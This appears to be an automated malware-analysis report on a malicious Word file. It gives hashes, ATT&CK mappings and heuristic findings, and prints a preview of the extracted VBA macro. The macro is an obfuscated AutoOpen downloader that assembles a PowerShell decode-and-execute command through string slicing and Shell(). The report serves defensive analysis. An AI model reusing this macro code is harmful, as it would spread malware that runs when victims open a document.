Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1baf8d17d7c2c257…

MALICIOUS

Office (OLE)

Size: 130.0 KB
Created: 2018-05-23 13:41:00
Authoring application: Microsoft Office Word
First seen: 2018-06-14
MD5: 889ff557c0b7d7606096a1d08087933f
SHA-1: 691e96e04733d632c16c1a0e2fe2e0a73e299573
SHA-256: 1baf8d17d7c2c25714c1ecbc70e90c1d185e50626d53b39110799bffea16a699
Risk Score: 142

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function, indicating it is designed to run automatically when the document is opened. The macro uses a Shell() call and builds obfuscated strings that appear to be related to downloading and executing a second-stage payload. Strings such as 'i3rshell zOAoW4rYcfwezHJXCKDZ-jCFZva' and '6c25x-oBjECT io.CoHmpReSZTjCFZvaven2Ph.DlcrKGWfoCzujmP' suggest downloader functionality.

Heuristics 5

  • VBA macros detected (medium; 2 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code
  • Shell() call in VBA (critical) [OLE_VBA_SHELL]
    Shell() call in VBA
  • AutoOpen macro (high) [OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 129529 bytes
SHA-256: 8802270af3e0422a8f28673597da8b0de3003ad1894b75407e4c27ea0320e655

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "IsOMqNqqiQsr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function OOuXFkPDirT()

On Error Resume Next
thUrTfb = OJDBDRch + CSng(687366) + 796075 / Sin(122938 - CByte(981610) / 997252 - Round(687366)) + zJJYEU * JLDZvtw - (796075 + 122938 + 981610 - 6873660)
Set QCQvAA = KiYlSvE
ORscZKZElz = "i3rshell zOAoW4rYcfwezHJXCKDZ-jCFZva"
YUccGtGJ = CStr(Left(Right(ORscZKZElz, 24), 1)) + Left(Right(ORscZKZElz, 17), 2) + CStr(Left(Right(ORscZKZElz, 34), 5)) + CStr(Left(Right(ORscZKZElz, 29), 2)) + CStr(Left(Right(ORscZKZElz, 7), 1)) + Left(Right(ORscZKZElz, 23), 1)

XRzlPRwQzF = "i3wsTyleA hAdj4iYdfaUzHJnDoDZTjCFZvaidJ2PhsWl"
ZGmFM = CStr(Left(Right(XRzlPRwQzF, 30), 1)) + Left(Right(XRzlPRwQzF, 21), 3) + CStr(Left(Right(XRzlPRwQzF, 43), 6)) + Left(Right(XRzlPRwQzF, 36), 2) + CStr(Left(Right(XRzlPRwQzF, 9), 2)) + CStr(Left(Right(XRzlPRwQzF, 28), 1))

YRiGiSl = "6c25x-oBjECT  io.CoHmpReSZTjCFZvaven2Ph.DlcrKGWfoCzujmP ( nEWFBv4oTvfIdBmEkYuKzw2oSIoNCoWKsJWJBGZhmWmb"
aanVFbhm = CStr(Left(Right(YRiGiSl, 68), 2)) + CStr(Left(Right(YRiGiSl, 47), 6)) + CStr(Left(Right(YRiGiSl, 97), 14)) + CStr(Left(Right(YRiGiSl, 82), 5)) + Left(Right(YRiGiSl, 20), 4) + CStr(Left(Right(YRiGiSl, 63), 2)) + CStr(Left(Right(YRiGiSl, 29), 1))

kmSEElidsi = "i3esTREAM([Adj4rFc.aUzHJXCLATTjCFZvavtJiohsWlcrK"
kzEiK = CStr(Left(Right(kmSEElidsi, 32), 1)) + CStr(Left(Right(kmSEElidsi, 22), 3)) + CStr(Left(Right(kmSEElidsi, 46), 7)) + CStr(Left(Right(kmSEElidsi, 39), 2)) + Left(Right(kmSEElidsi, 9), 2) + Left(Right(kmSEElidsi, 30), 1)

GzYtSIDqouJ = "3i6rySTReAMdj4rYcfMUz][SCKDZTeMoZvavysTPhsWlcrKGWfoCzu"
hnqEPHvL = CStr(Left(Right(GzYtSIDqouJ, 36), 1)) + CStr(Left(Right(GzYtSIDqouJ, 25), 3)) + CStr(Left(Right(GzYtSIDqouJ, 51), 8)) + Left(Right(GzYtSIDqouJ, 33), 3) + Left(Right(GzYtSIDqouJ, 18), 3)

EIjTZTMw = "6c25VeRT]::FroMfbASEJXCKDZTeMFZTrvtJ2PhsWlcr.conoCzujmPYQisOgFBv464sfIdBm7kYuKzw2"
EmZisKmlPDJ = CStr(Left(Right(EIjTZTMw, 54), 2)) + Left(Right(EIjTZTMw, 37), 4) + Left(Right(EIjTZTMw, 77), 11) + CStr(Left(Right(EIjTZTMw, 65), 4)) + CStr(Left(Right(EIjTZTMw, 16), 3)) + CStr(Left(Right(EIjTZTMw, 50), 2)) + Left(Right(EIjTZTMw, 24), 1)

ihhKfRmEbb = "Z 'bR6Zr5xNzOAdjG(YcfaUzHTXCKD"
Jidzr = Left(Right(ihhKfRmEbb, 20), 1) + Left(Right(ihhKfRmEbb, 14), 2) + CStr(Left(Right(ihhKfRmEbb, 29), 4)) + CStr(Left(Right(ihhKfRmEbb, 24), 2)) + CStr(Left(Right(ihhKfRmEbb, 5), 1))
wuuzM = fAcYJNEXZZ + CSng(158302) + 786837 / Sin(452645 - CByte(985248) / 497487 - Round(158302)) + mPOaIAs * kTnflQOJzs - (786837 + 452645 + 985248 - 1583020)
Set buvArwzUJj = ZqEvGAEbqtC
TFNLJhT = "Z8PtJ9c259AzOAdtIrYcfaxzHJX"
zITLaHqM = Left(Right(TFNLJhT, 18), 1) + CStr(Left(Right(TFNLJhT, 12), 2)) + CStr(Left(Right(TFNLJhT, 26), 4)) + Left(Right(TFNLJhT, 22), 1) + CStr(Left(Right(TFNLJhT, 5), 1))

PpwTo = Chr(43)
dpbAdwJTKB = "ZTsJvEra5xAsOAdj4r6kfaUzHJX3KDZTj"
XoHizvZoE = Left(Right(dpbAdwJTKB, 22), 1) + CStr(Left(Right(dpbAdwJTKB, 15), 2)) + CStr(Left(Right(dpbAdwJTKB, 32), 5)) + Left(Right(dpbAdwJTKB, 27), 2) + Left(Right(dpbAdwJTKB, 6), 1)

KtLlw = "ZKk0l6Dt5xszOAdjXVYcfaUzHOXCKD"
iNrIY = Left(Right(KtLlw, 20), 1) + Left(Right(KtLlw, 14), 2) + CStr(Left(Right(KtLlw, 29), 4)) + CStr(Left(Right(KtLlw, 24), 2)) + CStr(Left(Right(KtLlw, 5), 1))

BpiBMnoa = "i3i6VEUoZNjHBJIbCsfaUzHJJCKLlTjCFZvavtJdw17WlcrKGWfoCzujmPxlGsOgFBv4oTvf"
lGGXHi = CStr(Left(Right(BpiBMnoa, 48), 1)) + CStr(Left(Right(BpiBMnoa, 33), 4)) + CStr(Left(Right(BpiBMnoa, 68), 10)) + CStr(Left(Right(BpiBMnoa, 58), 4)) + CStr(Left(Right(BpiBMnoa, 14), 3)) + Left(Right(BpiBMnoa, 45), 2)

JiizwB = "3iM7oxD6zOAdjvrCEfaUz9/XCKWzTjCFZvavtJ2"
PlCTdXqDIZl = CStr(Left(Right(JiizwB, 26), 1)) + CStr(Left(Right(JiizwB, 18), 2)) + CStr(Left(Right(JiizwB, 37), 6)) + Left(Right(JiizwB, 24), 2) + CStr(Left(Right(JiizwB, 13), 2))

JCTcl = "i6c257Lb1W178czi8WI2rPJuIXZTjCFZvavt87Phs
... (truncated)